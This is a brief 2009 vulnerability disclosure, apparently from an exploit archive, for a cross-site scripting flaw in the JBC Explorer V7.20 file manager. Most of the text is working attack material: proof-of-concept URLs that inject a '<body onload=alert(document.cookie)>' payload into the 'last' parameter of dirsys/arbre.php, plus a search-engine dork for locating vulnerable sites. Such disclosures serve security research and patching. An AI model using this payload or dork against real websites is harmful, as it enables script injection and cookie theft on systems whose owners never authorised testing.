Explorer V7.20 Cross Site Scripting Vulnerability.pdf

1 ########################################### 2 # 3 # Script Name : Explorer V7.20 4 # 5 # Version : V7.20 Release Candidate 1 REV A 6 # 7 # Bug Type : XSS vulnerability 8 # 9 # Found by : Metropolis 10 # 11 # Discovered : 20 December 2009 12 # 13 # Download app : http://www.jbc−explorer.info/?action=download&download=16 14 # 15 # Dork : JBC explorer [ by Psykokwak & XaV ] 16 # 17 ########################################### 18 19 PoC : 20 21 http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss] 22 23 example : 24 25 http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)> 26 27 local Example : 28 29 http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)> 30 31 [ Greetz: 32 33 [~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~] Page 1/1 Explorer V7.20 Cross Site Scripting Vulnerability Metropolis 12/20/2009